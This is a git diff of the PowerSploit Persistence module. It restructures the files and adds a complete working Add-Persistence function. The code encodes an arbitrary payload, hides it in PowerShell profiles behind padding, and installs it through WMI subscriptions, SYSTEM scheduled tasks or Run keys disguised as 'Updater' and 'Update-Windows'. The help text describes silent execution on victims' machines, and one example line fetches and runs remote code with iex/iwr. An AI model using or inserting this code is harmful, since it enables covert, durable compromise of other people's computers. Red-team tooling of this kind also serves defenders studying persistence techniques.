$PersistantScript = $PersistantScript.ToString().Replace('EXECUTEFUNCTION', "$PersistenceScriptName -Persist") - } - -#endregion - -#region Generate final output - -# Generate the persistence removal script -$PersistenceRemoval = @" -# Execute the following to remove the elevated persistent payload -$ElevatedTriggerRemoval -# Execute the following to remove the user-level persistent payload -$UserTriggerRemoval -"@ - - - $PersistantScript | Out-File $PersistentScriptFile - Write-Verbose "Persistence script written to $PersistentScriptFile" - - $PersistenceRemoval | Out-File $RemovalScriptFile - Write-Verbose "Persistence removal script written to $RemovalScriptFile" - - if ($PassThru) - { - # Output a scriptblock of the persistent function. This can be passed to Out-EncodedCommand via the pipeline. - Write-Output ([ScriptBlock]::Create($PersistantScript)) - } - -#endregion -}
\ No newline at end of file diff --git a/Persistence/New-ElevatedPersistenceOptions.ps1 b/Persistence/New-ElevatedPersistenceOptions.ps1 deleted file mode 100644 index 4e11dee..0000000 --- a/Persistence/New-ElevatedPersistenceOptions.ps1 +++ /dev/null @@ -1,170 +0,0 @@ -function New-ElevatedPersistenceOptions -{ -<# -.SYNOPSIS - - Configure elevated persistence options for the Add-Persistence function. - - PowerSploit Function: New-ElevatedPersistenceOptions - Author: Matthew Graeber (@mattifestation) - License: BSD 3-Clause - Required Dependencies: None - Optional Dependencies: None - -.DESCRIPTION - - New-ElevatedPersistenceOptions allows for the configuration of elevated persistence options. The output of this function is a required parameter of Add-Persistence. Available persitence options in order of stealth are the following: permanent WMI subscription, scheduled task, and registry. - -.PARAMETER PermanentWMI - - Persist via a permanent WMI event subscription. This option will be the most difficult to detect and remove. - - Detection Difficulty: Difficult - Removal Difficulty: Difficult - User Detectable? No - -.PARAMETER ScheduledTask - - Persist via a scheduled task. - - Detection Difficulty: Moderate - Removal Difficulty: Moderate - User Detectable? No - -.PARAMETER Registry - - Persist via the HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key. Note: This option will briefly pop up a PowerShell console to the user. - - Detection Difficulty: Easy - Removal Difficulty: Easy - User Detectable? Yes - -.PARAMETER AtLogon - - Starts the payload upon any user logon. - -.PARAMETER AtStartup - - Starts the payload within 240 and 325 seconds of computer startup. - -.PARAMETER OnIdle - - Starts the payload after one minute of idling. - -.PARAMETER Daily - - Starts the payload daily. - -.PARAMETER At - - Starts the payload at the specified time. You may specify times in the following formats: '12:31 AM', '2 AM', '23:00:00', or '4:06:26 PM'. - -.EXAMPLE - - C:\PS> $ElevatedOptions = New-ElevatedPersistenceOptions -PermanentWMI -Daily -At '3 PM' - -.EXAMPLE - - C:\PS> $ElevatedOptions = New-ElevatedPersistenceOptions -Registry -AtStartup - -.EXAMPLE - - C:\PS> $ElevatedOptions = New-ElevatedPersistenceOptions -ScheduledTask -OnIdle - -.LINK - - http://www.exploit-monday.com -#> - - [CmdletBinding()] Param ( - [Parameter( ParameterSetName = 'PermanentWMIDaily', Mandatory = $True )] - [Parameter( ParameterSetName = 'PermanentWMIAtStartup', Mandatory = $True )] - [Switch] - $PermanentWMI, - - [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )] - [Parameter( ParameterSetName = 'ScheduledTaskAtLogon', Mandatory = $True )] - [Parameter( ParameterSetName = 'ScheduledTaskOnIdle', Mandatory = $True )] - [Switch] - $ScheduledTask, - - [Parameter( ParameterSetName = 'Registry', Mandatory = $True )] - [Switch] - $Registry, - - [Parameter( ParameterSetName = 'PermanentWMIDaily', Mandatory = $True )] - [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )] - [Switch] - $Daily, - - [Parameter( ParameterSetName = 'PermanentWMIDaily', Mandatory = $True )] - [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )] - [DateTime] - $At, - - [Parameter( ParameterSetName = 'ScheduledTaskOnIdle', Mandatory = $True )] - [Switch] - $OnIdle, - - [Parameter( ParameterSetName = 'ScheduledTaskAtLogon', Mandatory = $True )] - [Parameter( ParameterSetName = 'Registry', Mandatory = $True )] - [Switch] - $AtLogon, - - [Parameter( ParameterSetName = 'PermanentWMIAtStartup', Mandatory = $True )] - [Switch] - $AtStartup - ) - - $PersistenceOptionsTable = @{ - Method = '' - Trigger = '' - Time = '' - } - - switch ($PSCmdlet.ParameterSetName) - { - 'PermanentWMIAtStartup' - { - $PersistenceOptionsTable['Method'] = 'PermanentWMI' - $PersistenceOptionsTable['Trigger'] = 'AtStartup' - } - - 'PermanentWMIDaily' - { - $PersistenceOptionsTable['Method'] = 'PermanentWMI' - $PersistenceOptionsTable['Trigger'] = 'Daily' - $PersistenceOptionsTable['Time'] = $At - } - - 'ScheduledTaskAtLogon' - { - $PersistenceOptionsTable['Method'] = 'ScheduledTask' - $PersistenceOptionsTable['Trigger'] = 'AtLogon' - } - - 'ScheduledTaskOnIdle' - { - $PersistenceOptionsTable['Method'] = 'ScheduledTask' - $PersistenceOptionsTable['Trigger'] = 'OnIdle' - } - - 'ScheduledTaskDaily' - { - $PersistenceOptionsTable['Method'] = 'ScheduledTask' - $PersistenceOptionsTable['Trigger'] = 'Daily' - $PersistenceOptionsTable['Time'] = $At - } - - 'Registry' - { - $PersistenceOptionsTable['Method'] = 'Registry' - $PersistenceOptionsTable['Trigger'] = 'AtLogon' - } - } - - $PersistenceOptions = New-Object -TypeName PSObject -Property $PersistenceOptionsTable - $PersistenceOptions.PSObject.TypeNames[0] = 'PowerSploit.Persistence.ElevatedPersistenceOptions' - - Write-Output $PersistenceOptions -}
\ No newline at end of file diff --git a/Persistence/New-UserPersistenceOptions.ps1 b/Persistence/New-UserPersistenceOptions.ps1 deleted file mode 100644 index 9672c2e..0000000 --- a/Persistence/New-UserPersistenceOptions.ps1 +++ /dev/null @@ -1,128 +0,0 @@ -function New-UserPersistenceOptions -{ -<# -.SYNOPSIS - - Configure user-level persistence options for the Add-Persistence function. - - PowerSploit Function: New-UserPersistenceOptions - Author: Matthew Graeber (@mattifestation) - License: BSD 3-Clause - Required Dependencies: None - Optional Dependencies: None - -.DESCRIPTION - - New-UserPersistenceOptions allows for the configuration of elevated persistence options. The output of this function is a required parameter of Add-Persistence. Available persitence options in order of stealth are the following: scheduled task, registry. - -.PARAMETER ScheduledTask - - Persist via a scheduled task. - - Detection Difficulty: Moderate - Removal Difficulty: Moderate - User Detectable? No - -.PARAMETER Registry - - Persist via the HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key. Note: This option will briefly pop up a PowerShell console to the user. - - Detection Difficulty: Easy - Removal Difficulty: Easy - User Detectable? Yes - -.PARAMETER AtLogon - - Starts the payload upon any user logon. - -.PARAMETER OnIdle - - Starts the payload after one minute of idling. - -.PARAMETER Daily - - Starts the payload daily. - -.PARAMETER At - - Starts the payload at the specified time. You may specify times in the following formats: '12:31 AM', '2 AM', '23:00:00', or '4:06:26 PM'. - -.EXAMPLE - - C:\PS> $UserOptions = New-UserPersistenceOptions -Registry -AtLogon - -.EXAMPLE - - C:\PS> $UserOptions = New-UserPersistenceOptions -ScheduledTask -OnIdle - -.LINK - - http://www.exploit-monday.com -#> - - [CmdletBinding()] Param ( - [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )] - [Parameter( ParameterSetName = 'ScheduledTaskOnIdle', Mandatory = $True )] - [Switch] - $ScheduledTask, - - [Parameter( ParameterSetName = 'Registry', Mandatory = $True )] - [Switch] - $Registry, - - [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )] - [Switch] - $Daily, - - [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )] - [DateTime] - $At, - - [Parameter( ParameterSetName = 'ScheduledTaskOnIdle', Mandatory = $True )] - [Switch] - $OnIdle, - - [Parameter( ParameterSetName = 'Registry', Mandatory = $True )] - [Switch] - $AtLogon - ) - - $PersistenceOptionsTable = @{ - Method = '' - Trigger = '' - Time = '' - } - - switch ($PSCmdlet.ParameterSetName) - { - 'ScheduledTaskAtLogon' - { - $PersistenceOptionsTable['Method'] = 'ScheduledTask' - $PersistenceOptionsTable['Trigger'] = 'AtLogon' - } - - 'ScheduledTaskOnIdle' - { - $PersistenceOptionsTable['Method'] = 'ScheduledTask' - $PersistenceOptionsTable['Trigger'] = 'OnIdle' - } - - 'ScheduledTaskDaily' - { - $PersistenceOptionsTable['Method'] = 'ScheduledTask' - $PersistenceOptionsTable['Trigger'] = 'Daily' - $PersistenceOptionsTable['Time'] = $At - } - - 'Registry' - { - $PersistenceOptionsTable['Method'] = 'Registry' - $PersistenceOptionsTable['Trigger'] = 'AtLogon' - } - } - - $PersistenceOptions = New-Object -TypeName PSObject -Property $PersistenceOptionsTable - $PersistenceOptions.PSObject.TypeNames[0] = 'PowerSploit.Persistence.UserPersistenceOptions' - - Write-Output $PersistenceOptions -}
\ No newline at end of file diff --git a/Persistence/Persistence.psd1 b/Persistence/Persistence.psd1 index 21a7871..b2fa69f 100644 --- a/Persistence/Persistence.psd1 +++ b/Persistence/Persistence.psd1 @@ -1,4 +1,4 @@ -@{ +@{ # Script module or binary module file associated with this manifest. ModuleToProcess = 'Persistence.psm1' @@ -31,7 +31,6 @@ CmdletsToExport = '*' ModuleList = @(@{ModuleName = 'Persistence'; ModuleVersion = '1.0.0.0'; GUID = '633d0f10-a056-41da-869d-6d2f75430195'}) # List of all files packaged with this module -FileList = 'Persistence.psm1', 'Persistence.psd1', 'Add-Persistence.ps1', 'New-ElevatedPersistenceOptions.ps1', - 'New-UserPersistenceOptions.ps1', 'Usage.md' +FileList = 'Persistence.psm1', 'Persistence.psd1', 'Usage.md' -}
\ No newline at end of file +} diff --git a/Persistence/Persistence.psm1 b/Persistence/Persistence.psm1 index 4478ee1..d0545d6 100644 --- a/Persistence/Persistence.psm1 +++ b/Persistence/Persistence.psm1 @@ -1,3 +1,700 @@ -. (Join-Path $PSScriptRoot New-ElevatedPersistenceOptions.ps1) -. (Join-Path $PSScriptRoot New-UserPersistenceOptions.ps1) -. (Join-Path $PSScriptRoot Add-Persistence.ps1)
\ No newline at end of file +function New-ElevatedPersistenceOption +{ +<# +.SYNOPSIS + + Configure elevated persistence options for the Add-Persistence function. + + PowerSploit Function: New-ElevatedPersistenceOption + Author: Matthew Graeber (@mattifestation) + License: BSD 3-Clause + Required Dependencies: None + Optional Dependencies: None + +.DESCRIPTION + + New-ElevatedPersistenceOption allows for the configuration of elevated persistence options. The output of this function is a required parameter of Add-Persistence. Available persitence options in order of stealth are the following: permanent WMI subscription, scheduled task, and registry. + +.PARAMETER PermanentWMI + + Persist via a permanent WMI event subscription. This option will be the most difficult to detect and remove. + + Detection Difficulty: Difficult + Removal Difficulty: Difficult + User Detectable? No + +.PARAMETER ScheduledTask + + Persist via a scheduled task. + + Detection Difficulty: Moderate + Removal Difficulty: Moderate + User Detectable? No + +.PARAMETER Registry + + Persist via the HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key. Note: This option will briefly pop up a PowerShell console to the user. + + Detection Difficulty: Easy + Removal Difficulty: Easy + User Detectable? Yes + +.PARAMETER AtLogon + + Starts the payload upon any user logon. + +.PARAMETER AtStartup + + Starts the payload within 240 and 325 seconds of computer startup. + +.PARAMETER OnIdle + + Starts the payload after one minute of idling. + +.PARAMETER Daily + + Starts the payload daily. + +.PARAMETER At + + Starts the payload at the specified time. You may specify times in the following formats: '12:31 AM', '2 AM', '23:00:00', or '4:06:26 PM'. + +.EXAMPLE + + C:\PS> $ElevatedOptions = New-ElevatedPersistenceOption -PermanentWMI -Daily -At '3 PM' + +.EXAMPLE + + C:\PS> $ElevatedOptions = New-ElevatedPersistenceOption -Registry -AtStartup + +.EXAMPLE + + C:\PS> $ElevatedOptions = New-ElevatedPersistenceOption -ScheduledTask -OnIdle + +.LINK + + http://www.exploit-monday.com +#> + + [CmdletBinding()] Param ( + [Parameter( ParameterSetName = 'PermanentWMIDaily', Mandatory = $True )] + [Parameter( ParameterSetName = 'PermanentWMIAtStartup', Mandatory = $True )] + [Switch] + $PermanentWMI, + + [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )] + [Parameter( ParameterSetName = 'ScheduledTaskAtLogon', Mandatory = $True )] + [Parameter( ParameterSetName = 'ScheduledTaskOnIdle', Mandatory = $True )] + [Switch] + $ScheduledTask, + + [Parameter( ParameterSetName = 'Registry', Mandatory = $True )] + [Switch] + $Registry, + + [Parameter( ParameterSetName = 'PermanentWMIDaily', Mandatory = $True )] + [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )] + [Switch] + $Daily, + + [Parameter( ParameterSetName = 'PermanentWMIDaily', Mandatory = $True )] + [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )] + [DateTime] + $At, + + [Parameter( ParameterSetName = 'ScheduledTaskOnIdle', Mandatory = $True )] + [Switch] + $OnIdle, + + [Parameter( ParameterSetName = 'ScheduledTaskAtLogon', Mandatory = $True )] + [Parameter( ParameterSetName = 'Registry', Mandatory = $True )] + [Switch] + $AtLogon, + + [Parameter( ParameterSetName = 'PermanentWMIAtStartup', Mandatory = $True )] + [Switch] + $AtStartup + ) + + $PersistenceOptionsTable = @{ + Method = '' + Trigger = '' + Time = '' + } + + switch ($PSCmdlet.ParameterSetName) + { + 'PermanentWMIAtStartup' + { + $PersistenceOptionsTable['Method'] = 'PermanentWMI' + $PersistenceOptionsTable['Trigger'] = 'AtStartup' + } + + 'PermanentWMIDaily' + { + $PersistenceOptionsTable['Method'] = 'PermanentWMI' + $PersistenceOptionsTable['Trigger'] = 'Daily' + $PersistenceOptionsTable['Time'] = $At + } + + 'ScheduledTaskAtLogon' + { + $PersistenceOptionsTable['Method'] = 'ScheduledTask' + $PersistenceOptionsTable['Trigger'] = 'AtLogon' + } + + 'ScheduledTaskOnIdle' + { + $PersistenceOptionsTable['Method'] = 'ScheduledTask' + $PersistenceOptionsTable['Trigger'] = 'OnIdle' + } + + 'ScheduledTaskDaily' + { + $PersistenceOptionsTable['Method'] = 'ScheduledTask' + $PersistenceOptionsTable['Trigger'] = 'Daily' + $PersistenceOptionsTable['Time'] = $At + } + + 'Registry' + { + $PersistenceOptionsTable['Method'] = 'Registry' + $PersistenceOptionsTable['Trigger'] = 'AtLogon' + } + } + + $PersistenceOptions = New-Object -TypeName PSObject -Property $PersistenceOptionsTable + $PersistenceOptions.PSObject.TypeNames[0] = 'PowerSploit.Persistence.ElevatedPersistenceOption' + + Write-Output $PersistenceOptions +} + +function New-UserPersistenceOption +{ +<# +.SYNOPSIS + + Configure user-level persistence options for the Add-Persistence function. + + PowerSploit Function: New-UserPersistenceOption + Author: Matthew Graeber (@mattifestation) + License: BSD 3-Clause + Required Dependencies: None + Optional Dependencies: None + +.DESCRIPTION + + New-UserPersistenceOption allows for the configuration of elevated persistence options. The output of this function is a required parameter of Add-Persistence. Available persitence options in order of stealth are the following: scheduled task, registry. + +.PARAMETER ScheduledTask + + Persist via a scheduled task. + + Detection Difficulty: Moderate + Removal Difficulty: Moderate + User Detectable? No + +.PARAMETER Registry + + Persist via the HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key. Note: This option will briefly pop up a PowerShell console to the user. + + Detection Difficulty: Easy + Removal Difficulty: Easy + User Detectable? Yes + +.PARAMETER AtLogon + + Starts the payload upon any user logon. + +.PARAMETER OnIdle + + Starts the payload after one minute of idling. + +.PARAMETER Daily + + Starts the payload daily. + +.PARAMETER At + + Starts the payload at the specified time. You may specify times in the following formats: '12:31 AM', '2 AM', '23:00:00', or '4:06:26 PM'. + +.EXAMPLE + + C:\PS> $UserOptions = New-UserPersistenceOption -Registry -AtLogon + +.EXAMPLE + + C:\PS> $UserOptions = New-UserPersistenceOption -ScheduledTask -OnIdle + +.LINK + + http://www.exploit-monday.com +#> + + [CmdletBinding()] Param ( + [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )] + [Parameter( ParameterSetName = 'ScheduledTaskOnIdle', Mandatory = $True )] + [Switch] + $ScheduledTask, + + [Parameter( ParameterSetName = 'Registry', Mandatory = $True )] + [Switch] + $Registry, + + [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )] + [Switch] + $Daily, + + [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )] + [DateTime] + $At, + + [Parameter( ParameterSetName = 'ScheduledTaskOnIdle', Mandatory = $True )] + [Switch] + $OnIdle, + + [Parameter( ParameterSetName = 'Registry', Mandatory = $True )] + [Switch] + $AtLogon + ) + + $PersistenceOptionsTable = @{ + Method = '' + Trigger = '' + Time = '' + } + + switch ($PSCmdlet.ParameterSetName) + { + 'ScheduledTaskAtLogon' + { + $PersistenceOptionsTable['Method'] = 'ScheduledTask' + $PersistenceOptionsTable['Trigger'] = 'AtLogon' + } + + 'ScheduledTaskOnIdle' + { + $PersistenceOptionsTable['Method'] = 'ScheduledTask' + $PersistenceOptionsTable['Trigger'] = 'OnIdle' + } + + 'ScheduledTaskDaily' + { + $PersistenceOptionsTable['Method'] = 'ScheduledTask' + $PersistenceOptionsTable['Trigger'] = 'Daily' + $PersistenceOptionsTable['Time'] = $At + } + + 'Registry' + { + $PersistenceOptionsTable['Method'] = 'Registry' + $PersistenceOptionsTable['Trigger'] = 'AtLogon' + } + } + + $PersistenceOptions = New-Object -TypeName PSObject -Property $PersistenceOptionsTable + $PersistenceOptions.PSObject.TypeNames[0] = 'PowerSploit.Persistence.UserPersistenceOption' + + Write-Output $PersistenceOptions +} + +function Add-Persistence +{ +<# +.SYNOPSIS + + Add persistence capabilities to a script. + + PowerSploit Function: Add-Persistence + Author: Matthew Graeber (@mattifestation) + License: BSD 3-Clause + Required Dependencies: New-ElevatedPersistenceOption, New-UserPersistenceOption + Optional Dependencies: None + +.DESCRIPTION + + Add-Persistence will add persistence capabilities to any script or scriptblock. This function will output both the newly created script with persistence capabilities as well a script that will remove a script after it has been persisted. + +.PARAMETER ScriptBlock + + Specifies a scriptblock containing your payload. + +.PARAMETER FilePath + + Specifies the path to your payload. + +.PARAMETER ElevatedPersistenceOption + + Specifies the trigger for the persistent payload if the target is running elevated. + You must run New-ElevatedPersistenceOption to generate this argument. + +.PARAMETER UserPersistenceOption + + Specifies the trigger for the persistent payload if the target is not running elevated. + You must run New-UserPersistenceOption to generate this argument. + +.PARAMETER PersistenceScriptName + + Specifies the name of the function that will wrap the original payload. The default value is 'Update-Windows'. + +.PARAMETER DoNotPersistImmediately + + Output only the wrapper function for the original payload. By default, Add-Persistence will output a script that will automatically attempt to persist (e.g. it will end with 'Update-Windows -Persist'). If you are in a position where you are running in memory but want to persist at a later time, use this option. + +.PARAMETER PersistentScriptFilePath + + Specifies the path where you would like to output the persistence script. By default, Add-Persistence will write the removal script to 'Persistence.ps1' in the current directory. + +.PARAMETER RemovalScriptFilePath + + Specifies the path where you would like to output a script that will remove the persistent payload. By default, Add-Persistence will write the removal script to 'RemovePersistence.ps1' in the current directory. + +.PARAMETER PassThru + + Outputs the contents of the persistent script to the pipeline. This option is useful when you want to write the original persistent script to disk and pass the script to Out-EncodedCommand via the pipeline. + +.INPUTS + + None + + Add-Persistence cannot receive any input from the pipeline. + +.OUTPUTS + + System.Management.Automation.ScriptBlock + + If the '-PassThru' switch is provided, Add-Persistence will output a scriptblock containing the contents of the persistence script. + +.NOTES + + When the persistent script executes, it will not generate any meaningful output as it was designed to run as silently as possible on the victim's machine. + +.EXAMPLE + + C:\PS>$ElevatedOptions = New-ElevatedPersistenceOption -PermanentWMI -Daily -At '3 PM' + C:\PS>$UserOptions = New-UserPersistenceOption -Registry -AtLogon + C:\PS>Add-Persistence -FilePath .\EvilPayload.ps1 -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -Verbose + + Description + ----------- + Creates a script containing the contents of EvilPayload.ps1 that when executed with the '-Persist' switch will persist the payload using its respective persistence mechanism (user-mode vs. elevated) determined at runtime. + +.EXAMPLE + + C:\PS>$Rickroll = { iex (iwr http://bit.ly/e0Mw9w ) } + C:\PS>$ElevatedOptions = New-ElevatedPersistenceOption -ScheduledTask -OnIdle + C:\PS>$UserOptions = New-UserPersistenceOption -ScheduledTask -OnIdle + C:\PS>Add-Persistence -ScriptBlock $RickRoll -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -Verbose -PassThru | Out-EncodedCommand | Out-File .\EncodedPersistentScript.ps1 + + Description + ----------- + Creates a script containing the contents of the provided scriptblock that when executed with the '-Persist' switch will persist the payload using its respective persistence mechanism (user-mode vs. elevated) determined at runtime. The output is then passed through to Out-EncodedCommand so that it can be executed in a single command line statement. The final, encoded output is finally saved to .\EncodedPersistentScript.ps1 + +.LINK + + http://www.exploit-monday.com +#> + + [CmdletBinding()] Param ( + [Parameter( Mandatory = $True, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock' )] + [ValidateNotNullOrEmpty()] + [ScriptBlock] + $ScriptBlock, + + [Parameter( Mandatory = $True, ParameterSetName = 'FilePath' )] + [ValidateNotNullOrEmpty()] + [Alias('Path')] + [String] + $FilePath, + + [Parameter( Mandatory = $True )] + $ElevatedPersistenceOption, + + [Parameter( Mandatory = $True )] + $UserPersistenceOption, + + [ValidateNotNullOrEmpty()] + [String] + $PersistenceScriptName = 'Update-Windows', + + [ValidateNotNullOrEmpty()] + [String] + $PersistentScriptFilePath = "$PWD\Persistence.ps1", + + [ValidateNotNullOrEmpty()] + [String] + $RemovalScriptFilePath = "$PWD\RemovePersistence.ps1", + + [Switch] + $DoNotPersistImmediately, + + [Switch] + $PassThru + ) + + Set-StrictMode -Version 2 + +#region Validate arguments + + if ($ElevatedPersistenceOption.PSObject.TypeNames[0] -ne 'PowerSploit.Persistence.ElevatedPersistenceOption') + { + throw 'You provided invalid elevated persistence options.' + } + + if ($UserPersistenceOption.PSObject.TypeNames[0] -ne 'PowerSploit.Persistence.UserPersistenceOption') + { + throw 'You provided invalid user-level persistence options.' + } + + $Path = Split-Path $PersistentScriptFilePath -ErrorAction Stop + $Leaf = Split-Path $PersistentScriptFilePath -Leaf -ErrorAction Stop + $PersistentScriptFile = '' + $RemovalScriptFile = '' + + if ($Path -eq '') + { + $PersistentScriptFile = "$($PWD)\$($Leaf)" + } + else + { + $PersistentScriptFile = "$($Path)\$($Leaf)" + } + + $Path = Split-Path $RemovalScriptFilePath -ErrorAction Stop + $Leaf = Split-Path $RemovalScriptFilePath -Leaf -ErrorAction Stop + if ($Path -eq '') + { + $RemovalScriptFile = "$($PWD)\$($Leaf)" + } + else + { + $RemovalScriptFile = "$($Path)\$($Leaf)" + } + + if ($PSBoundParameters['FilePath']) + { + Get-ChildItem $FilePath -ErrorAction Stop + $Script = [IO.File]::ReadAllText((Resolve-Path $Path)) + } + else + { + $Script = $ScriptBlock + } + +#endregion + +#region Initialize data + + $CompressedScript = '' + $UserTrigger = '' + $UserTriggerRemoval = '' + $ElevatedTrigger = "''" + $ElevatedTriggerRemoval = '' + $UserTrigger = "''" + $UserTriggerRemoval = '' + $CommandLine = '' + +#endregion + +#region Compress the original payload in preparation for the persistence script + + $ScriptBytes = ([Text.Encoding]::ASCII).GetBytes($Script) + $CompressedStream = New-Object IO.MemoryStream + $DeflateStream = New-Object IO.Compression.DeflateStream ($CompressedStream, [IO.Compression.CompressionMode]::Compress) + $DeflateStream.Write($ScriptBytes, 0, $ScriptBytes.Length) + $DeflateStream.Dispose() + $CompressedScriptBytes = $CompressedStream.ToArray() + $CompressedStream.Dispose() + $EncodedCompressedScript = [Convert]::ToBase64String($CompressedScriptBytes) + + # Generate the code that will decompress and execute the payload. + # This code is intentionally ugly to save space. + $NewScript = 'sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String(' + "'$EncodedCompressedScript'" + '),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()' + +#endregion + +#region Process persistence options + + # Begin processing elevated persistence options + switch ($ElevatedPersistenceOption.Method) + { + 'PermanentWMI' + { + $ElevatedTriggerRemoval = { +Get-WmiObject __eventFilter -namespace root\subscription -filter "name='Updater'"| Remove-WmiObject +Get-WmiObject CommandLineEventConsumer -Namespace root\subscription -filter "name='Updater'" | Remove-WmiObject +Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription | Where-Object { $_.filter -match 'Updater'} | Remove-WmiObject + } + + switch ($ElevatedPersistenceOption.Trigger) + { + 'AtStartup' + { + $ElevatedTrigger = "`"```$Filter=Set-WmiInstance -Class __EventFilter -Namespace ```"root\subscription```" -Arguments @{name='Updater';EventNameSpace='root\CimV2';QueryLanguage=```"WQL```";Query=```"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325```"};```$Consumer=Set-WmiInstance -Namespace ```"root\subscription```" -Class 'CommandLineEventConsumer' -Arguments @{ name='Updater';CommandLineTemplate=```"```$(```$Env:SystemRoot)\System32\WindowsPowerShell\v1.0\powershell.exe -NonInteractive```";RunInteractively='false'};Set-WmiInstance -Namespace ```"root\subscription```" -Class __FilterToConsumerBinding -Arguments @{Filter=```$Filter;Consumer=```$Consumer} | Out-Null`"" + } + + 'Daily' + { + $ElevatedTrigger = "`"```$Filter=Set-WmiInstance -Class __EventFilter -Namespace ```"root\subscription```" -Arguments @{name='Updater';EventNameSpace='root\CimV2';QueryLanguage=```"WQL```";Query=```"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour = $($ElevatedPersistenceOption.Time.ToString('HH')) AND TargetInstance.Minute = $($ElevatedPersistenceOption.Time.ToString('mm')) GROUP WITHIN 60```"};```$Consumer=Set-WmiInstance -Namespace ```"root\subscription```" -Class 'CommandLineEventConsumer' -Arguments @{ name='Updater';CommandLineTemplate=```"```$(```$Env:SystemRoot)\System32\WindowsPowerShell\v1.0\powershell.exe -NonInteractive```";RunInteractively='false'};Set-WmiInstance -Namespace ```"root\subscription```" -Class __FilterToConsumerBinding -Arguments @{Filter=```$Filter;Consumer=```$Consumer} | Out-Null`"" + } + + default + { + throw 'Invalid elevated persistence options provided!' + } + } + } + + 'ScheduledTask' + { + $CommandLine = '`"$($Env:SystemRoot)\System32\WindowsPowerShell\v1.0\powershell.exe -NonInteractive`"' + $ElevatedTriggerRemoval = "schtasks /Delete /TN Updater" + + switch ($ElevatedPersistenceOption.Trigger) + { + 'AtLogon' + { + $ElevatedTrigger = "schtasks /Create /RU system /SC ONLOGON /TN Updater /TR " + } + + 'Daily' + { + $ElevatedTrigger = "schtasks /Create /RU system /SC DAILY /ST $($ElevatedPersistenceOption.Time.ToString('HH:mm:ss')) /TN Updater /TR " + } + + 'OnIdle' + { + $ElevatedTrigger = "schtasks /Create /RU system /SC ONIDLE /I 1 /TN Updater /TR " + } + + default + { + throw 'Invalid elevated persistence options provided!' + } + } + + $ElevatedTrigger = '"' + $ElevatedTrigger + $CommandLine + '"' + } + + 'Registry' + { + $ElevatedTrigger = "New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\Run\ -Name Updater -PropertyType String -Value " + $ElevatedTriggerRemoval = "Remove-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\Run\ -Name Updater" + $CommandLine = "`"```"`$(`$Env:SystemRoot)\System32\WindowsPowerShell\v1.0\powershell.exe```" -NonInteractive -WindowStyle Hidden`"" + $ElevatedTrigger = "'" + $ElevatedTrigger + $CommandLine + "'" + } + + default + { + throw 'Invalid elevated persistence options provided!' + } + } + + # Begin processing user-level persistence options + switch ($UserPersistenceOption.Method) + { + 'ScheduledTask' + { + $CommandLine = '`"$($Env:SystemRoot)\System32\WindowsPowerShell\v1.0\powershell.exe -NonInteractive`"' + $UserTriggerRemoval = "schtasks /Delete /TN Updater" + + switch ($UserPersistenceOption.Trigger) + { + 'Daily' + { + $UserTrigger = "schtasks /Create /SC DAILY /ST $($UserPersistenceOption.Time.ToString('HH:mm:ss')) /TN Updater /TR " + } + + 'OnIdle' + { + $UserTrigger = "schtasks /Create /SC ONIDLE /I 1 /TN Updater /TR " + } + + default + { + throw 'Invalid user-level persistence options provided!' + } + } + + $UserTrigger = '"' + $UserTrigger + $CommandLine + '"' + } + + 'Registry' + { + $UserTrigger = "New-ItemProperty -Path HKCU:Software\Microsoft\Windows\CurrentVersion\Run\ -Name Updater -PropertyType String -Value " + $UserTriggerRemoval = "Remove-ItemProperty -Path HKCU:Software\Microsoft\Windows\CurrentVersion\Run\ -Name Updater" + $CommandLine = "`"```"`$(`$Env:SystemRoot)\System32\WindowsPowerShell\v1.0\powershell.exe```" -NonInteractive -WindowStyle Hidden`"" + $UserTrigger = "'" + $UserTrigger + $CommandLine + "'" + } + + default + { + throw 'Invalid user-level persistence options provided!' + } + } + +#endregion + +#region Original script with its persistence logic will reside here + +# This is intentionally ugly in the interest of saving space on the victim machine. +$PersistantScript = { +function FUNCTIONNAME{ +Param([Switch]$Persist) +$ErrorActionPreference='SilentlyContinue' +$Script={ORIGINALSCRIPT} +if($Persist){ +if(([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]'Administrator')) +{$Prof=$PROFILE.AllUsersAllHosts;$Payload=ELEVATEDTRIGGER} +else +{$Prof=$PROFILE.CurrentUserAllHosts;$Payload=USERTRIGGER} +' '*600+$Script.ToString()|Out-File $Prof -A -NoC -Fo +iex $Payload|Out-Null +Write-Output $Payload} +else +{$Script.Invoke()} +} EXECUTEFUNCTION + +} + + $PersistantScript = $PersistantScript.ToString().Replace('FUNCTIONNAME', $PersistenceScriptName) + $PersistantScript = 